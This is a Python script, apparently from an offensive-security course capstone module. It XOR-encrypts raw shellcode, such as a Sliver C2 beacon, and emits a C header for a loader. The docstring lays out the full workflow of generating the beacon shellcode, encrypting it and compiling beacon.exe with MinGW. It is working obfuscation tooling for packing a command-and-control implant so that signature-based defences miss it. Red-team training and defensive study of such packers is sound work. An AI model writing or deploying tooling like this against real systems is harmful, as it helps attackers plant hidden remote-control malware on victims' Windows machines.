#!/usr/bin/env python3
"""
Script: xor_encrypt.py
Module: 11 — Assembling The Pieces (Capstone)
Purpose: XOR-encrypt a raw shellcode binary and output a C header (shellcode.h) for loader.c
Usage:   python3 xor_encrypt.py <input.bin> <output.h> [--key-length N]
Target:  Sliver beacon.bin (or any raw shellcode blob)

Workflow:
  1. Generate Sliver shellcode (shellcode format, not exe):
       generate --os windows --arch amd64 --format shellcode -o beacon.bin
  2. Encrypt:  python3 xor_encrypt.py beacon.bin shellcode.h
  3. Compile loader:  x86_64-w64-mingw32-gcc loader.c -o beacon.exe -luser32 -Os -s
"""

import argparse
import os
import sys


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    return bytes(data[i] ^ key[i % len(key)] for i in range(len(data)))


def format_c_array(name: str, data: bytes) -> str:
    hex_bytes = ", ".join(f"0x{b:02x}" for b in data)
    return (
        f"unsigned char {name}[] = {{\n"
        f"    {hex_bytes}\n"
        f"}};\n"
        f"unsigned int {name}_len = {len(data)};\n"
    )


def main():
    parser = argparse.ArgumentParser(description="XOR-encrypt shellcode → C header")
    parser.add_argument("input",      help="Raw shellcode binary (e.g. beacon.bin)")
    parser.add_argument("output",     help="Output C header file (e.g. shellcode.h)")
    parser.add_argument("--key-length", type=int, default=16,
                        help="Random key length in bytes (default: 16)")
    args = parser.parse_args()

    # Read raw shellcode
    with open(args.input, "rb") as f:
        shellcode = f.read()
    print(f"[*] Read {len(shellcode)} bytes from {args.input}")

    # Generate random key
    key = os.urandom(args.key_length)
    print(f"[*] Key ({args.key_length} bytes): {key.hex()}")

    # Encrypt
    encrypted = xor_encrypt(shellcode, key)
    print(f"[*] Encrypted {len(encrypted)} bytes")

    # Write header
    header = (
        f"/* Auto-generated by xor_encrypt.py — do not edit */\n"
        f"/* Original size: {len(shellcode)} bytes | Key length: {len(key)} bytes */\n\n"
        + format_c_array("payload", encrypted)
        + "\n"
        + format_c_array("key", key)
    )

    with open(args.output, "w") as f:
        f.write(header)
    print(f"[+] Written: {args.output}")
    print(f"[+] Build:   x86_64-w64-mingw32-gcc loader.c -o beacon.exe -luser32 -Os -s")


if __name__ == "__main__":
    main()
